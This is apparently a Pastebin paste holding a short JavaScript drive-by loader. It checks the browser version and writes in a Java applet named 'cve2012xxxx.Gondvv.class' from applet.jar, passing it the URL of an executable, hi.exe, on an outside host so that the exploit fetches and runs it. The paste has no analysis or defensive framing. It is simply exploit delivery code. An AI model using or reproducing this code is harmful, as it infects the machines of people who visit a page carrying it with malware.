Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- var xxx3 = window.navigator.userAgent.toLowerCase();
- if (xxx3.indexOf("msie 6") > -1) {
- document.write("<OBJECT classid='clsid:8AD9C840-044E-11D1-B3E9-00805F499D93' width='200' height='200'><param name=xiaomaolv value= 'http://ok.aa24.net/meeting/hi.exe'><param name=bn value= 'woyouyizhixiaomaolv'><param name=si value= 'conglaiyebuqi'><param name=bs value= '748'><param name=CODE value= 'cve2012xxxx.Gondvv.class'><param name=archive value= 'applet.jar'></OBJECT>");
- } else {
- document.write("<br>");
- var gondady = document.createElement("body");
- document.body.appendChild(gondady);
- var gondad = document.createElement("applet");
- gondad.width = "256";
- gondad.height = "256";
- gondad.archive = "applet.jar";
- gondad.code = "cve2012xxxx.Gondvv.class";
- gondad.setAttribute("xiaomaolv", "http://ok.aa24.net/meeting/hi.exe");
- gondad.setAttribute("bn", "woyouyizhixiaomaolv");
- gondad.setAttribute("si", "conglaiyebuqi");
- gondad.setAttribute("bs", "748");
- document.body.appendChild(gondad);
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement